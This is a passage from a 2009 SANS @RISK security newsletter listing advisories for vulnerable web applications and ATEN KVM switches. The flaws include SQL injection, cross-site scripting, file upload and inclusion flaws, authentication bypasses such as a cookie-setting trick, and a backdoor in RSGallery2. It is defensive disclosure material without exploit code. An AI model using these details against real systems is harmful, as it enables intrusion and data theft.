• Description: ASP Inline Corporate Calendar is an ASP-based calendar application. The application is exposed to multiple issues because it fails to adequately sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
• Ref: http://www.securityfocus.com/bid/35054

• 09.22.56 - CVE: Not Available
• Platform: Web Application
• Title: VICIDIAL Call Center Suite "admin.php" Multiple SQL Injection Vulnerabilities
• Description: VICIDIAL Call Center Suite is an application for managing Asterisk PBX telephony implementations. The application is prone to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the "Username" and "Password" textboxes when logging in to the application through the "admin.php" script. VICIDIAL Call Center Suite version 2.0.5-173 is affected.
• Ref: http://www.securityfocus.com/bid/35056

• 09.22.57 - CVE: CVE-2009-1734
• Platform: Web Application
• Title: VidShare Pro SQL Injection and Cross-Site Scripting Vulnerabilities
• Description: VidShare Pro is a PHP-based web application. The application is exposed to multiple issues because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
• Ref: http://www.securityfocus.com/bid/35033

• 09.22.58 - CVE: Not Available
• Platform: Web Application
• Title: DMXReady Registration Manager "assetmanager.asp" Arbitrary File Upload
• Description: DMXReady Registration Manager is a web-site registration application implemented in ASP. The application is exposed to an issue that lets attackers upload arbitrary files. The problem occurs because the "assetmanager.asp" script fails to restrict the types or extensions of files uploaded to the server. DMXReady Registration Manager version 1.1 is affected.
• Ref: http://www.securityfocus.com/bid/35039

• 09.22.59 - CVE: Not Available
• Platform: Web Application
• Title: NC GBook "index.php" Remote PHP Code Injection
• Description: NC GBook is a PHP-based guestbook application. The application is exposed to an issue that attackers can leverage to execute arbitrary PHP code in the context of the application. This issue occurs because the application fails to sufficiently sanitize input supplied via the "Autor", "E-Mail", and "Homepage" fields when a new guestbook entry is added via the "index.php" script. NC GBook version 1.0 is affected.
• Ref: http://www.securityfocus.com/bid/35044

• 09.22.60 - CVE: Not Available
• Platform: Web Application
• Title: NC LinkList "index.php" Remote PHP Code Injection
• Description: NC LinkList is a PHP-based web application. The application is exposed to an issue that attackers can leverage to execute arbitrary PHP code in the context of the application. This issue occurs because the application fails to sufficiently sanitize input supplied via the "Ihr Name" field when a new link comment is added via the "index.php" script. NC LinkList version 1.3.1 is affected.
• Ref: http://www.securityfocus.com/bid/35045

• 09.22.61 - CVE: CVE-2009-1591
• Platform: Web Application
• Title: CGI Rescue WEB Mailer HTTP Header Injection
• Description: CGI Rescue WEB Mailer is a web application. The application is exposed to an issue that allows attackers to inject arbitrary HTTP headers because it fails to sanitize input. This issue is caused by a failure to handle carriage return and line feed characters in unspecified fields. WEB Mailer versions prior to 1.04 are affected.
• Ref: http://jvndb.jvn.jp/en/contents/2009/JVNDB-2009-000024.html

• 09.22.62 - CVE: Not Available
• Platform: Web Application
• Title: Jorp "functions.php" Authentication Bypass
• Description: Jorp is a web-based project management application. The application is exposed to an authentication bypass issue because it fails to perform adequate authentication checks. Specifically, an attacker may delete arbitrary projects or tasks. This issue affects the "y" parameter of the "functions.php" script. Jorp version 1.3.05.09 is affected.
• Ref: http://www.securityfocus.com/archive/1/503678

• 09.22.63 - CVE: Not Available
• Platform: Web Application
• Title: Drupal Views Bulk Operations Security Bypass
• Description: "Views bulk operations" is a third-party plugin module for the Drupal content manager. The module performs bulk updates of nodes. The module is exposed to a security bypass issue that may allow attackers to perform certain actions on specific nodes or classes of nodes without proper authorization. "Views bulk operations" versions prior to 5.x-1.4 and 6.x-1.7 are affected.
• Ref: http://drupal.org/node/468450

• 09.22.64 - CVE: Not Available
• Platform: Web Application
• Title: Tutorial Share Insecure Cookie Authentication Bypass
• Description: Tutorial Share is a web application implemented in PHP. The application is exposed to an authentication bypass issue because it fails to adequately verify user-supplied input used for cookie-based authentication. Specifically, attackers can gain administrative access to the application by setting the "usernamed" cookie parameter to an administrator's username and the "path" parameter to "/" via the "admin/index.php" script. Tutorial Share version 3.4 is affected.
• Ref: http://www.securityfocus.com/bid/35075

• 09.22.65 - CVE: Not Available
• Platform: Web Application
• Title: ZaoCMS "upload.php" Arbitrary File Upload
• Description: ZaoCMS is a PHP-based content manager. The application is exposed to an issue that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately validate user-supplied input before uploading files via the "upload.php" script.
• Ref: http://www.securityfocus.com/bid/35078

• 09.22.66 - CVE: Not Available
• Platform: Web Application
• Title: Multiple Mole Group Products "admin.php" Remote Password Change
• Description: Mole Group provides several web-based PHP applications. Multiple Mole Group products are exposed to an issue that may permit attackers to change the password of arbitrary administrator users. An attacker may exploit this issue by submitting an HTTP POST request containing malicious data to the "admin/admin.php" script.
• Ref: http://www.securityfocus.com/bid/35079

• 09.22.67 - CVE: Not Available
• Platform: Web Application
• Title: Zeeways PHOTOVIDEOTUBE Multiple Remote Vulnerabilities
• Description: Zeeways PHOTOVIDEOTUBE is a PHP-based web application. The application is exposed to multiple remote issues. The attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, gain unauthorized access to the affected application, or execute arbitrary HTML or JavaScript code within the context of the affected site. Zeeways PHOTOVIDEOTUBE version 1.1 is affected.
• Ref: http://www.securityfocus.com/bid/35080

• 09.22.68 - CVE: Not Available
• Platform: Web Application
• Title: Cute Editor for ASP.NET "file" Parameter Directory Traversal
• Description: Cute Editor for ASP.NET is a WYSIWYG browser-based online HTML editor. The application is exposed to a directory traversal issue because it fails to sufficiently sanitize user-supplied input to the "file" parameter of the "Load.ashx" script. A remote attacker could exploit the vulnerability using directory-traversal characters ("../") to access arbitrary files that contain sensitive information that could aid in further attacks.
• Ref: http://www.securityfocus.com/bid/35085

• 09.22.69 - CVE: Not Available
• Platform: Web Application
• Title: Basic Analysis And Security Engine Cross-Site Scripting and HTML Injection Vulnerabilities
• Description: Basic Analysis And Security Engine (BASE) provides a web front-end to query and analyze alerts coming from a SNORT IDS system. BASE is exposed to multiple cross-site scripting and HTML injection issues because it fails to sufficiently sanitize user-supplied data. These issues affect the "base_ag_main.php" and "base_qry_main.php" scripts. BASE version 1.4.2 is affected.
• Ref: http://base.secureideas.net/

• 09.22.70 - CVE: Not Available
• Platform: Web Application
• Title: MiniTwitter SQL Injection and Cross-Site Scripting Vulnerabilities
• Description: MiniTwitter is a PHP-based application. The application is exposed to multiple security issues. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. MiniTwitter version 0.3 Beta is affected.
• Ref: http://www.securityfocus.com/archive/1/503775

• 09.22.71 - CVE: Not Available
• Platform: Web Application
• Title: AMember Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
• Description: AMember is a PHP application that manages membership and subscription for a web site. AMember is exposed to multiple input validation issues. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. AMember version 3.1.7 is affected.
• Ref: http://www.securityfocus.com/archive/1/503776

• 09.22.72 - CVE: Not Available
• Platform: Web Application
• Title: Dokuwiki "doku.php" Local File Include
• Description: Dokuwiki is a PHP-based wiki application. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "config_cascade[main][default][]" parameter of the "doku.php" script. Dokuwiki versions 2009-02-14, rc2009-02-06, and rc2009-01-30 are affected.
• Ref: http://www.securityfocus.com/bid/35095

• 09.22.73 - CVE: Not Available
• Platform: Web Application
• Title: WP-Lytebox "main.php" Local File Include
• Description: WP-Lytebox is a PHP-based plugin for the WordPress weblog application. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "pg" parameter of the "main.php" script. WP-Lytebox version 1.3 is affected.
• Ref: http://www.securityfocus.com/bid/35098

• 09.22.74 - CVE: Not Available
• Platform: Web Application
• Title: cpCommerce "GLOBALS[prefix]" Local/Remote File Include
• Description: cpCommerce is a web-based e-commerce application. The application is exposed to a local/remote file include issue because it fails to sufficiently sanitize user-supplied input to the "GLOBALS[prefix]" parameter of the "_functions.php" script. cpCommerce versions in the 1.2.x branch are affected.
• Ref: http://www.securityfocus.com/bid/35103

• 09.22.75 - CVE: Not Available
• Platform: Web Application
• Title: RSGallery2 Component for Mambo/Joomla! Backdoor
• Description: RSGallery2 is a gallery component for the Mambo/Joomla! content managers. RSGallery2 is exposed to a backdoor issue. The backdoor resides in the "includes/rsgallery.class.php" and "language/english-utf8.php" scripts. The scripts contain "eval()", "execute()", and "shell_exec()" function calls with a user-supplied "POST" argument. RSGallery2 versions 1.14.3 and 2.0.0b1 are affected.
• Ref: http://www.securityfocus.com/archive/1/503824

• 09.22.76 - CVE: Not Available
• Platform: Web Application
• Title: ZEECAREERS and SHAADICLONE "admin/addadminmembercode.php" Authentication Bypass
• Description: Zeeways ZEECAREERS and SHAADICLONE are web-based applications. The applications are exposed to an authentication bypass issue. Specifically, the application fails to restrict access to the "admin/addadminmembercode.php" script. SHAADICLONE and ZEECAREERS version 2.0 is affected.
• Ref: http://www.securityfocus.com/bid/35107

• 09.22.77 - CVE: Not Available
• Platform: Web Application
• Title: RoomPHPlanning Multiple Vulnerabilities
• Description: RoomPHPlanning is a PHP-based reservations application. The application is exposed to multiple issues. RoomPHPlanning version 1.6 is affected.
• Ref: http://www.securityfocus.com/bid/35110

• 09.22.78 - CVE: CVE-2009-1474, CVE-2009-1473, CVE-2009-1472,CVE-2009-1477
• Platform: Network Device
• Title: Multiple ATEN IP KVM Switches Multiple Remote Vulnerabilities and Weakness
• Description: Multiple ATEN IP KVM switches are exposed to multiple remote issues Attackers can exploit these issues to execute Java code, compromise and gain unauthorized access to the affected device connected to the KVM, gain access to the session key, and gain access to the session ID. Other attacks are also possible.
• Ref: http://www.securityfocus.com/archive/1/503827

(c) 2009. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.